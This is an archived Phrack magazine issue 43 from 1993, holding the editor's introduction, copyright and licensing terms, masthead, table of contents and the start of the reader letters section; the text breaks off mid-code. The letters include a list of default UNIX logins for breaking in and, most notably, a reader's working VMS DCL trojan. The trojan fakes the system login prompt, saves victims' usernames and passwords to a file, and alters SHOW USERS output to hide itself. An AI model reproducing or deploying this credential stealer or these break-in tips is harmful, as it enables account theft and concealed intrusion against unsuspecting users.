💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › PHRACK › PHRACK43 captured on 2022-06-12 at 13:58:25.
View Raw
More Information
-=-=-=-=-=-=-
==Phrack Magazine==
Volume Four, Issue Forty-Three, File 1 of 27
Issue 43 Index
___________________
P H R A C K 4 3
July 1, 1993
___________________
~ finger whitehouse.gov and make a secret service agent come ~
Well, here it is: Phrack 43. This issue should really piss every security
professional off. Well, actually, none of them should ever see it because
only two people have registered their subscriptions.
But, then again I think we all know that the whole world is FULL of
lying, thieving people who just don't care about other people's
property. No, smarty, not hackers...computer professionals!
CASE 1:
The Computer Emergency Response Team. Bastions of life, liberty and the
pursuit of happiness. CERT had been on the Phrack mailing list
previously, and was sent a copy of 42 (as was everyone) to give them
the opportunity to subscribe. Rather than do the right thing
and let us at Phrack know that they were not interested in paying,
and to take their name off the list, Ed DiHart instead forwarded off
several copies to his cronies.
Luckily for us, Ed is not the best typist, and the mail bounced all the way
back to Phrack. I called Ed and asked him why he would do such a thing,
which was clearly a direct violation of US Copyright Law. Ed claimed
he didn't know of any new rules for Phrack, and that he had always forwarded
off a few copies to his pals. I told Ed that this practice was unacceptable
and that if he wanted to continue to get Phrack he and his pals would all have
to register their subscriptions. Ed said that he did not want to pay
and to take CERT off the list.
A month prior to this Ed had said to me at the Computers, Freedom & Privacy
conference in San Francisco, "Why are YOU here anyway? It sure is IRONIC
that someone whose goal in life was to invade other people's privacy would
be attending a conference on protecting privacy." I walked away from him in
disgust.
While talking to Ed about Phrack I said, "You know Ed, it sure is IRONIC
that an organization such as CERT, whose main goal is to help protect
the property of others would so flagrantly violate US Copyright law and
completely disregard someone's property rights." Man, did that feel great!
CASE 2:
BT Tymnet. Dale Drew, security guru, made the statement on IRC about
Phrack, "I have absolutely no desire to pay for anything having to do with
hackers." Later, someone from Dale's machine at BT Tymnet (opus.tymnet.com)
logged into Len Rose's machine and ftp'd Phrack 42. With prior knowledge
Phrack was not free, he willingly used company property to commit a crime.
At most companies, that is grounds for termination. Luckily for Dale
Tymnet doesn't give a shit. In fact, Dale several times since has gone
back on IRC stating, "People here are Tymnet are kind of upset about
Phrack 42." This just shows that people at Tymnet are just as criminal
as they say hackers are. Since they could care less about MY property,
then why should I care about theirs? Maybe I should print a list of
all Tymnet internal NUIs! Well, two wrongs won't make a right, so I better
not.
I did, however, send email to Dale stating that we were aware of Tymnet's
transgressions and that we may be forced to take legal action. I have
decided to offer BT a sweet deal on a company-wide site license. We
shall see if they take me up on this offer, or continue to steal Phrack.
CASE 3:
Gail Thackeray. A woman sworn by the court to uphold the laws of the
land. This woman had the audacity to tell me that unless I
enforced my copyright, it was worthless. Unless I enforce it. What the
hell does that mean? Am I supposed to raid companies myself and
go dig for evidence that they have stolen my information? Geez...it's
not like I'm Bellcore. Gail's disgusting interpretation of the law,
that unless you are big enough to stand up for yourself then you have
no recourse, is a festering sore on the face of the American Legal system
and I personally am appalled that this woman is allowed to act as
a law enforcement professional.
Oh well, as you can tell I've had a little fun with all this. And I have
effectively proven my point. Security people, corporate professionals,
and law enforcement types are just as unscrupulous and unethical as they
have always claimed that we are.
Only TWO PEOPLE within the computer/legal/security profession have the right
to receive and keep copies of Phrack. Winn Schwartau, and a man at Mitre.
It's amazing that they are the only ones with any scruples, isn't it?
Well, let's get on with the issue. This one is pure, unadulterated evil.
Only the strong will survive this time. We've got Cellular, we've got
Novell, we've got 5e, we've got PHRACK TRIVIA! Get comfortable, grab
your favorite intoxicant, and enjoy.
- NOTES* Some of you will recognize the 5ESS file from the Summer issue of
2600 magazine. This file was sent to both myself and E. Goldstein. I
was told by the author that 2600 was not printing it. Wrong. Well, we
got permission from 2600 to print it here too since its such a good file,
and since I spent like 8 hours dealing with the author correcting
and editing it. In the future gang, if you send something to Phrack AND
to 2600, TELL US BEFOREHAND! The last thing I want to hear is, "Phrack
is plagiarizing 2600...gawd they are so lame." The acronym file, you will
note, is DIFFERENT. Heh.
In addition to the above, you may notice that we were a bit late in
distributing this issue. As many of you saw through the "resubscribe"
blurb sent over the mailing list, Phrack is not going through Stormking.COM
any longer. The struggle to relocate put us into further delays
but I've managed to take care of securing a new distribution site.
We want to thank everyone at Stormking for shipping Phrack out for
so long, and wish them the best in their future endeavors.
-------------------------------------------------------------------------
READ THE FOLLOWING
IMPORTANT REGISTRATION INFORMATION
Corporate/Institutional/Government: If you are a business,
institution or government agency, or otherwise employed by,
contracted to or providing any consultation relating to computers,
telecommunications or security of any kind to such an entity, this
information pertains to you.
You are instructed to read this agreement and comply with its
terms and immediately destroy any copies of this publication
existing in your possession (electronic or otherwise) until
such a time as you have fulfilled your registration requirements.
A form to request registration agreements is provided
at the end of this file.
Individual User: If you are an individual end user whose use
is not on behalf of a business, organization or government
agency, you may read and possess copies of Phrack Magazine
free of charge. You may also distribute this magazine freely
to any other such hobbyist or computer service provided for
similar hobbyists. If you are unsure of your qualifications
as an individual user, please contact us as we do not wish to
withhold Phrack from anyone whose occupations are not in conflict
with our readership.
_______________________________________________________________
Phrack Magazine corporate/institutional/government agreement
Notice to users ("Company"): READ THE FOLLOWING LEGAL
AGREEMENT. Company's use and/or possession of this Magazine is
conditioned upon compliance by company with the terms of this
agreement. Any continued use or possession of this Magazine is
conditioned upon payment by company of the negotiated fee
specified in a letter of confirmation from Phrack Magazine.
This magazine may not be distributed by Company to any
outside corporation, organization or government agency. This
agreement authorizes Company to use and possess the number of copies
described in the confirmation letter from Phrack Magazine and for which
Company has paid Phrack Magazine the negotiated agreement fee. If
the confirmation letter from Phrack Magazine indicates that Company's
agreement is "Corporate-Wide", this agreement will be deemed to cover
copies duplicated and distributed by Company for use by any additional
employees of Company during the Term, at no additional charge. This
agreement will remain in effect for one year from the date of the
confirmation letter from Phrack Magazine authorizing such continued use
or such other period as is stated in the confirmation letter (the "Term").
If Company does not obtain a confirmation letter and pay the applicable
agreement fee, Company is in violation of applicable US Copyright laws.
This Magazine is protected by United States copyright laws and
international treaty provisions. Company acknowledges that no title to
the intellectual property in the Magazine is transferred to Company.
Company further acknowledges that full ownership rights to the Magazine
will remain the exclusive property of Phrack Magazine and Company will
not acquire any rights to the Magazine except as expressly set
forth in this agreement. Company agrees that any copies of the
Magazine made by Company will contain the same proprietary
notices which appear in this document.
In the event of invalidity of any provision of this agreement,
the parties agree that such invalidity shall not affect the validity
of the remaining portions of this agreement.
In no event shall Phrack Magazine be liable for consequential, incidental
or indirect damages of any kind arising out of the delivery, performance or
use of the information contained within the copy of this magazine, even
if Phrack Magazine has been advised of the possibility of such damages.
In no event will Phrack Magazine's liability for any claim, whether in
contract, tort, or any other theory of liability, exceed the agreement fee
paid by Company.
This Agreement will be governed by the laws of the State of Texas
as they are applied to agreements to be entered into and to be performed
entirely within Texas. The United Nations Convention on Contracts for
the International Sale of Goods is specifically disclaimed.
This Agreement together with any Phrack Magazine
confirmation letter constitute the entire agreement between
Company and Phrack Magazine which supersedes any prior agreement,
including any prior agreement from Phrack Magazine, or understanding,
whether written or oral, relating to the subject matter of this
Agreement. The terms and conditions of this Agreement shall
apply to all orders submitted to Phrack Magazine and shall supersede any
different or additional terms on purchase orders from Company.
_________________________________________________________________
REGISTRATION INFORMATION REQUEST FORM
We have approximately __________ users.
We desire Phrack Magazine distributed by (Choose one):
Electronic Mail: _________
Hard Copy: _________
Diskette: _________ (Include size & computer format)
Name:_______________________________ Dept:____________________
Company:_______________________________________________________
Address:_______________________________________________________
_______________________________________________________________
City/State/Province:___________________________________________
Country/Postal Code:___________________________________________
Telephone:____________________ Fax:__________________________
Send to:
Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701
-----------------------------------------------------------------------------
Enjoy the magazine. It is for and by the hacking community. Period.
Editor-In-Chief : Erik Bloodaxe (aka Chris Goggans)
3L33t : OMAR
News : Datastream Cowboy
Photography : dFx
Pornography : Stagliano
Prison Consultant : Co / Dec
The Baddest : Dolomite
Rad Book : Snow Crash
Reasons Why I Am
The Way I Am : Hoffman, Hammett, The Power Computer
Typist : Minor Threat
Future Movie Star : Weevil
SCon Acid Casualty : Weevil
Thanks To : Robert Clark, Co/Dec, Spy Ace, Lex Luthor
Phreak Accident, Madjus, Frosty, Synapse, Hawkwind
Firm G.R.A.S.P., Aleph One, Len Rose, Seven-Up
Computer Crime Laboratories
"If you can take the bag off of your own head, then you haven't had
enough nitrous." -- KevinTX
Phrack Magazine V. 4, #43, July 1, 1993. ISSN 1068-1035
Contents Copyright (C) 1993 Phrack Magazine, all rights reserved.
Nothing may be reproduced in whole or in part without written
permission of the Editor-In-Chief. Phrack Magazine is made available
quarterly to the amateur computer hobbyist free of charge. Any
corporate, government, legal, or otherwise commercial usage or
possession (electronic or otherwise) is strictly prohibited without
prior registration, and is in violation of applicable US Copyright laws.
To subscribe, send email to phrack@well.sf.ca.us and ask to be added to
the list.
Phrack Magazine
603 W. 13th #1A-278 (Phrack Mailing Address)
Austin, TX 78701
ftp.netsys.com (Phrack FTP Site)
/pub/phrack
phrack@well.sf.ca.us (Phrack E-mail Address)
Submissions to the above email address may be encrypted
with the following key : (Not that we use PGP or encourage its
use or anything. Heavens no. That would be politically-incorrect.
Maybe someone else is decrypting our mail for us on another machine
that isn't used for Phrack publication. Yeah, that's it. :) )
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.1
mQCNAiuIr00AAAEEAMPGAJ+tzwSTQBjIz/IXs155El9QW8EPyIcd7NjQ98CRgJNy
ltY43xMKv7HveHKqJC9KqpUYWwvEBLqlZ30H3gjbChXn+suU18K6V1xRvxgy21qi
a4/qpCMxM9acukKOWYMWA0zg+xf3WShwauFWF7btqk7GojnlY1bCD+Ag5Uf1AAUR
tCZQaHJhY2sgTWFnYXppbmUgPHBocmFja0B3ZWxsLnNmLmNhLnVzPg==
=q2KB
-----END PGP PUBLIC KEY BLOCK-----
-= Phrack 43 =-
Table Of Contents
~~~~~~~~~~~~~~~~~
1. Introduction by The Editor 24K
2. Phrack Loopback Part I 38K
3. Phrack Loopback Part II / Editorial 44K
4. Line Noise Part I 39K
5. Line Noise Part II 43K
6. Phrack Pro-Phile on Doctor Who 15K
7. Conference News Part I by Various Sources 53K
8. Conference News Part II by Various Sources 58K
9. How To Hack Blackjack (Part I) by Lex Luthor 52K
10. How To Hack Blackjack (Part II) by Lex Luthor 50K
11. Help for Verifying Novell Security by Phrack Staff 48K
12. My Bust (Part I) by Robert Clark 56K
13. My Bust (Part II) by Robert Clark 55K
14. Playing Hide and Seek, Unix Style by Phrack Accident 31K
15. Physical Access and Theft of PBX Systems by Co/Dec 28K
16. Guide to the 5ESS by Firm G.R.A.S.P. 63K
17. Cellular Info by Madjus (N.O.D.) 47K
18. LODCOM BBS Archive Information 24K
19. LODCOM Sample Messages 52K
20. Step By Step Guide To Stealing a Camaro by Spy Ace 21K
21. Acronyms Part I by Firm G.R.A.S.P. 50K
22. Acronyms Part II by Firm G.R.A.S.P. 51K
23. Acronyms Part III by Firm G.R.A.S.P. 45K
24. Acronyms Part IV by Firm G.R.A.S.P. 52K
25. Acronyms Part V by Firm G.R.A.S.P. 46K
26. International Scene by Various Sources 51K
27. Phrack World News by Datastream Cowboy 24K
Total: 1152K
Another reason why the future is wireless.
"The CTIA recommended that the FCC require the microprocessor chip be
difficult to detach from the circuit board in order to prevent its
removal and replacement or reprogramming."
(Cellular Marketing, p. 18, May 1993)
"Damn, and I was hoping to replace this 8051 with a P5! HAHAHAHAHA!"
(Anonymous hacker-type, Tumbled Cellphone Call, 1993)
_______________________________________________________________________________
==Phrack Magazine==
Volume Four, Issue Forty-Three, File 2 of 27
Phrack Loopback
Part I
- ***************************************************************************
COMING NEXT ISSUE
Van Eck Info (Theory & Practice)
More Cellular (Monitoring Reverse Channel, Broadcasting, Reprogramming)
HUGE University Dialup List (Mail Us YOUR School's Dialup NOW!)
Neato Plans For Evil Devices
Gail Thackeray Gifs
- ********************************** M A I L *********************************
Chris,
Craig Neidorf gave me these addresses as ways to reach you. He tells me
that you are currently editing Phrack. I hope you are well.
Recently the EFF sysadmins, Chris Davis and Helen Rose, informed me that
eff.org was using so much of its T-1 bandwidth that UUNET, who supplies our
IUP connection, was charging us an extra $1,000 per month. They did some
investigation at my request. We determined that Phrack traffic alone was
responsible for over 40% of the total bytes transferred from the site over
the past year or so. This is several gigabytes per month. All in all, the
CuD archive, which contains Phrack, CuD, and other publications accounts
for 85% of our total traffic. All of the email to and from EFF, Usenet
traffic, and other FTP (from the EFF archive, the CAF archive, and others)
constitutes about 15%.
EFF isn't going to be able to carry it any more because it is effectively
costing us $1,000 per month. The fundamental problem is that Phrack is so
popular (at least as a free good) to cause real expense in transmission
costs. Ultimately the users are going to have to pay the costs because
bandwidth (when measures in gigabytes anyway) isn't free. The 12K per
year it costs us to carry Phrack is not something which EFF can justify in
its budget. I'm sure you can understand this.
On July 1, eff.org moves from Cambridge to Washington, DC which is when I
expect we will stop carrying it. I wanted to raise this issue now to let
you know in advance of this happening.
I have also asked Chris and Helen to talk to Brendan Kehoe, who actually
maintains the archive, to see whether there is anything we can do to help
find another site for Phrack or make any other arrangement which will
result in less loss of service.
Mitch
------------------------------------------------------------------------------
Mitchell Kapor, Electronic Frontier Foundation
Note permanent new email address for all correspondence as of 6/1/93
mkapor@kei.com
[Editor: Well, all things must come to an end. Looks like EFF's
move to Washington is leaving behind lots of bad
memories, and looking forward to a happy life in the hotbed
of American politics. We wish them good luck. We also
encourage everyone to join.........CPSR.
In all fairness, I did ask Mitch more detail about the
specifics of the cost, and he explained that EFF was paying
flat rate for a fractional T-1, and whenever they went over
their allotted bandwidth, they were billed above and beyond
the flat rate. Oh well. Thank GOD for Len Rose.
Phrack now has a new home at ftp.netsys.com.]
- ***************************************************************************
I'm having a really hard time finding a lead to the Information
America Network. I am writing you guys as a last resort. Could
you point me in the right direction? Maybe an access number or
something? Thanks you very much.
[Editor: You can reach Information America voice at 404-892-1800.
They will be more than happy to send you loads of info.]
- ***************************************************************************
To whom it may concern:
This is a submission to the next issue of phrack...thanks for the great
'zine!
----------------------------cut here-------------------------------
Greetings Furds:
Have you ever wanted to impress one of those BBS-babes with your astounding
knowledge of board tricks? Well *NOW* you can! Be the life of the party!
Gain and influence friends! Irritate SysOps! Attain the worship and
admiration of your online pals. Searchlight BBS systems (like many other
software packages) have internal strings to display user information in
messages/posts and the like. They are as follows (tested on Searchlight BBS
System v2.25D):
\%A = displays user's access level
\%B = displays baud rate connected at
\%C = unknown
\%F = unknown
\%G = displays graphics status
\%K = displays user's first name
\%L = displays system time
\%M = displays user's time left on system
\%N = displays user's name in format: First Last
\%O = times left to call "today"
\%P = unknown
\%S = displays line/node number and BBS name
\%T = displays user's time limit
\%U = displays user's name in format: FIRST_LAST
All you gotta do is slam the string somewhere in the middle of a post or
something and the value will be inserted for the reader to see.
Example: Hey there chump, I mean \%K, you better you better UL or log
off of \%S...you leach too damn many files..you got \%M mins
left to upload some new porn GIFs or face bodily harm and
mutilation!.
----------------------------
Have phun!
Inf0rmati0n Surfer (& Dr. Cloakenstein)
SysOp Cranial Manifestations vBBS
[Editor: Ya know, once a LONG LONG time ago, I got on a BBS and
while reading messages noticed that a large amount of
messages seemed to be directed at ME!!# It took me
about 10 minutes to figure it out, but BOY WAS I MAD!
Then I added my own \%U message for the next hapless fool.
:) BIG FUN!]
- ***************************************************************************
-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-(/)-(\)-
SotMESC
The US SotMESC Chapter is offering
Scholarships for the 1993 school term.
Entries should be single-spaced paragraphs,
Double-spacing between paragraphs.
The subject should center on an aspect of the
Computer Culture and be between 20-30 pages long.
Send entries to:
SotMESC
PO Box 573
Long Beach, MS 39560
All entries submitted will become the property of the SotMESC
-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-()-
- ***************************************************************************
The Southwest Netrunner's League's
-----------------------------------------------------------------
WareZ RoDeNtZ Guide to UNIX!!!!
-----------------------------------------------------------------
Compiled by:The Technomancer (UNICOS,UNIX,VMS,and Amigas)
Assists by:SysCon XIV (The Ma'Bell Rapist)
Iron Man MK 4a (Things that make ya go boom)
This file begs to be folded, spindeled,and mutilated.
No Rights Reserved@1993
-----------------------------------------------------------------
Technomancer can be reached at: af604@FreeNet.hsc.colorado.edu
Coming this September.... Shadowland, 68020... Watch this space.
-----------------------------------------------------------------
Part I(Basic commands)
Phile Commands: ls=List Philes
more,page=Display Phile on Yo Terminal
cp=Copy Phile
mv=Move or Remove Philes
rm=Remove Philes
Editor Commnds: vi=Screen Editor
Dirtory cmmnds: dir=Prints Directory
mkdir=Makes a new Directory(also a VERY bad bug)
rmdir=Remove a Directory
pwd=print working directory
Misc. Commands: apropos=Locate commands by keyword lookup.
whatis=Display command description.
man=Displays manual pages online.
cal=Prints calendar
date=Prints the time and date.
who=Prints out every one who is logged in
(Well, almost everyone 7:^] )
---------------------------------------------------------------
Part II(Security(UNIX security, another OXYMORON 7:^] ))
If you are a useless wAReZ r0dEnT who wants to try to Netrun
a UNIX system, try these logins....
root
unmountsys
setup
makefsys
sysadm
powerdown
mountfsys
checkfsys
All I can help ya with on da passwords iz ta give you some
simple guidelines on how they are put together....
6-8 characters
6-8 characters
1 character is a special character (exmpl:# ! ' & *)
-----------------------------------------------------------------
Well thats all fo' now tune in next time, same Hack-time
same Hack-channel!!!
THE TECHNOMANCER I have taken all knowledge
af604@FreeNet.hsc.colorado.edu
to be my province
--
Technomancer
Southwest Netrunner's League
- ****************************************************************
[Editor: This is an example of what NOT to send to Phrack.
This is probably the worst piece of garbage I've
received, so I had to print it. I can only hope
that it's a private joke that I just don't get.
Uh, please don't try to write something worse and
submit it hoping to have it singled out as the
next "worst," since I'll just ignore it.]
- ***************************************************************************
Dear Phrack,
I was looking through Phrack 42 and noticed the letters about password
stealers. It just so happened that the same day I had gotten extremely
busted for a program which was infinitely more indetectible. Such is life.
I got off pretty well being an innocent looking female so it's no biggie.
Anyway, I deleted the program the same day because all I could think was
"Shit, I'm fucked". I rewrote a new and improved version, and decided to
submit it. The basic advantages of this decoy are that a) there is no
login failure before the user enters his or her account, and b) the
program defines the show users command for the user so that when they
do show users, the fact that they are running out of another account
doesn't register on their screen.
There are a couple holes in this program that you should probably be
aware of. Neither of these can kick the user back into the account that
the program is running from, so that's no problem, but the program can
still be detected. (So basically, don't run it out of your own account...
except for maybe once...to get a new account to run it out of) First, once
the user has logged into their account (out of your program of course) hitting
control_y twice in a row will cause the terminal to inquire if they are
doing this to terminate the session on the remote node. Oops. It's really no
problem though, because most users wouldn't even know what this meant. The
other problem is that, if the user for some strange reason redefines show:
$show == ""
then the show users screen will no longer eliminate the fact that the account
is set host out of another. That's not a big deal either, however, because
not many people would sit around randomly deciding to redefine show.
The reason I was caught was that I (not even knowing the word "hacker"
until about a month ago) was dumb enough to let all my friends know about the
program and how it worked. The word got spread to redefine show, and that's
what happened. The decoy was caught and traced to me. Enough BS...here's the
program. Sorry...no UNIX...just VMS.
Lady Shade
I wrote the code...but I got so many ideas from my buddies:
Digital Sorcerer, Y.K.F.W., Techno-Pirate, Ephemereal Presence, and Black Ice
------------------------------------------------
$if p1 .eqs. "SHOW" then goto show
$sfile = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The role of the dummy file in this program is to tell if the program !!!!
!!!! is being used as a decoy or as a substitute login for the victim. It !!!!
!!!! does not stay in your directory after program termination. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$sfile = f$search("sys$system:[ZJABAD_X]dummy.txt")
$if sfile .nes. "" then goto other
$open/write io user.dat
$close io
$open/write dummy instaar_device:[miller_g]dummy.txt
$close dummy
$wo == "write sys$output"
$line = ""
$user = ""
$pass = ""
$a$ = ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! A login screen with a message informing someone of new mail wouldnt !!!!
!!!! be too cool... !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$set broadcast=nomail
$set message/noidenficitaion/noseverity/nofacility/notext
$on error then goto outer
$!on control_y then goto inner
$wo " [H [2J"
$wo ""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! insert a fake logout screen here !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$wo " ZJABAD_X logged out at ", f$time()
$wo " [2A"
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This is the main body of the program. It simulates the system login !!!!
!!!! screen. It also grabs the username and password and sticks them in !!!!
!!!! a file called user.dat !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$outer:
$set term/noecho
$inquire a$/nopun ""
$inquire a$/nopun ""
$set term/echo
$c = 0
$c1 = 0
$c2 = 0
$inner:
$c2 = c2 + 1
$if c2 .eqs. 5 then goto speedup
$c = c + 1
$if c .eqs. 15 then goto fail
$if c1 .eqs. 3 then goto fail3
$user = "a"
$wo "Username: "
$from_speedup:
$set term/uppercase
$wo " [2A"
$read/time_out=10/prompt=" [9C " sys$command user
$if user .eqs. "a" then goto timeout
$set term/nouppercase
$if user .eqs. "" then goto inner
$set term/noecho
$inquire pass "Password"
$set term/echo
$if user .eqs. "ME" then goto done
$if pass .eqs. "" then goto fail
$open/append io user.dat
$write io user + " " + pass
$close io
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Sends the user into their account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$open/write io set.com
$write io "$set host 0"
$write io user + "/COMMAND=INSTAAR_DEVICE:[MILLER_G]FINDNEXT"
$write io pass
$close io
$@set
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Control has been returned to your account !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$write io " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! Simulates a failure if the password is null, and also if the !!!!
!!!! username prompt has cycled through 15 times... This is what !!!!
!!!! the system login screen does. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail:
$c = 1
$c1 = c1 + 1
$wo "User authorization failure"
$wo " [1A"
$goto inner
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! After the third failure, the system usually sends the screen back !!!!
!!!! one step...this just handles that. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$fail3:
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! The system keeps a timeout check in the login. If a username is not !!!!
!!!! entered quickly enough, the timeout message is activated !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$timeout:
$set term/nouppercase
$wo "Error reading command input"
$wo "Timeout period expired"
$wo " [2A"
$goto outer
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! There is a feature in this program which sets the terminal to !!!!
!!!! uppercase for the input of a username. This is wonderful for !!!!
!!!! preventing program detection, but it does cause a problem. It slows !!!!
!!!! the screen down, which looks suspicious. So, in the case where a !!!!
!!!! user walks up tot he terminal and holds the return key down for a !!!!
!!!! bit before typing in their username, this section speeds up the run !!!!
!!!! considerably. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$speedup:
$set term/nouppercase
$fast_loop:
$user = "a"
$read/time_out=1/prompt="Username: " sys$command io
$if user .eqs. "a" then goto from_speedup
$goto fast_loop
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is optional. There are many ways that you can implement !!!!
!!!! to break out of the program when you think you have gotten enough !!!!
!!!! passwords. 1), you can sit down at the terminal and type in a string !!!!
!!!! for the username and pass which kicks you out. If this option is !!!!
!!!! implemented, you should at least put in something that looks like !!!!
!!!! you have just logged in, the program should not kick straight back !!!!
!!!! to your command level, but rather execute your login.com. 2) You !!!!
!!!! can log in to the account which is stealing the password from a !!!!
!!!! different terminal and stop the process on the account which is !!!!
!!!! running the program. This is much safer, and my recommandation. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$done:
$set broadcast=mail
$set message/facility/text/identification/severity
$delete dummy.txt;*
$exit
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!! This section is how one covers up the fact that the account which has !!!!
!!!! been stolen is running out of another. Basically, the area of the show!!!!
!!!! users screen which registers this is at the far right hand side. !!!!
!!!! This section first writes the show users data to a file and alters !!!!
!!!! it before it is written to the screen for viewing by the user. There !!!!
!!!! may exist many forms of the show users command in your system, and !!!!
!!!! you may have to handle each one differently. I have written only two !!!!
!!!! manipulations into this code to be used as an example. But looking !!!!
!!!! at how this is preformed should be enough to allow you to write your !!!!
!!!! own special cases. Notice that what happens to activate this section !!!!
!!!! of the program is the computer detects the word "show" and interprets !!!!
!!!! it as a procedure call. The words following show become variables !!!!
!!!! passed into the program as p1, p2, etc. in the order which they !!!!
!!!! were typed after the word show. Also, by incorporating a third data !!!!
!!!! file into the manipulations, one can extract the terminal id for the !!!!
!!!! account which the program is running out of and plug this into the !!!!
!!!! place where the user's line displays his or her terminal id. Doing !!!!
!!!! this is better that putting in a fake terminal id, but that is just a !!!!
!!!! minor detail. !!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
$show:
$show = ""
$show$ = ""
$length = 0
$ch = ""
$full = 0
$c = 0
$if (f$extract(5,1,p2) .eqs. "/") .and. (f$extract(6,4,p2) .nes. "FULL") then show 'p1'
$if (p2 .eqs. "USERS/FULL") .and. (p3 .eqs. "") then goto ufull
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then show users
$if p2 .eqs. "USERS" .and. p3 .eqs. "" then exit
$if p3 .eqs. "" then goto fallout
$goto full
$fallout:
$show 'p2' 'p3'
$exit
$ufull:
$show users/full/output=users.dat
$goto manipulate
$full:
$show$ = p3 + "/output=users.dat"
$show users 'show